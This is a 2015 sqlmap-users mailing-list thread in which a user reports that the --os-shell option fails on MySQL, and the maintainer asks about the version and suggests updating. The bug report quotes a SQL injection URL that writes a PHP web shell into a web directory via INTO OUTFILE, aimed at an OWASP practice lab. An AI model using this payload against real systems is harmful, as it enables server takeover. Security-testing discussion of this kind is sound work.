Re: [sqlmap-users] SQLmap --os-shell BUG
From: Miroslav S. <mir...@gm...> - 2015-07-04 22:44:04
I believe that you are using an old revision. For a long time there has been at least a git revision or a pseudo "non-git" number appearing when "sqlmap --version" is being used. Please update to the latest revision from the official GitHub repository and rerun sqlmap.

Bye

On Sun, Jul 5, 2015 at 12:41 AM, Danux <da...@gm...> wrote:

> Thanks
>
> sqlmap --version
> sqlmap/1.0-dev
>
> In the meantime I will patch procs/mysql/write_file_limit.sql
>
> On Sat, Jul 4, 2015 at 3:40 PM, Miroslav Stampar <mir...@gm...> wrote:
>
>> Which revision/version of sqlmap do you use? There has been a related
>> patch a month ago. Will check tomorrow.
>>
>> Bye
>>
>> On Sun, Jul 5, 2015 at 12:33 AM, Danux <da...@gm...> wrote:
>>
>>> Hello list, there is an issue with sqlmap when using the --os-shell
>>> option in version sqlmap/1.0-dev and MySQL: 5.5.35-0+wheezy1 (Debian)
>>>
>>> Description:
>>>
>>> A specific PAYLOAD (see below) used to upload a web shell will create an
>>> empty file e.g. tmpbezff.php, this will cause that every subsequent PAYLOAD
>>> attempt will fail with an "already exist" error and therefore not able
>>> to upload the web shell.
>>>
>>> http://OwaspPractice/injection/lessons/lesson03/index.php?code=NTGRWNR%22%29%20LIMIT%200,1%20INTO%20OUTFILE%20%27/var/www/OwaspPractice/upload/tmpupjed.php%27%20LINES%20TERMINATED%20BY%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--+
>>>
>>> By default, MySQL will throw an error if the file already exists:
>>>
>>> mysql> select 'ss' into outfile '/var/www/OwaspPractice/upload/tmpbezff.php';
>>> ERROR 1086 (HY000): File '/var/www/OwaspPractice/upload/tmpbezff.php' already exists
>>>
>>> Solution:
>>>
>>> 1. Change the web shell name for every new PAYLOAD attempt, at least
>>> when using the --os-shell option
>>> 2. Fix the PAYLOAD causing problems.
>>>
>>> --
>>> DanUx
>>
>> --
>> Miroslav Stampar
>> http://about.me/stamparm
>
> --
> DanUx

--
Miroslav Stampar
http://about.me/stamparm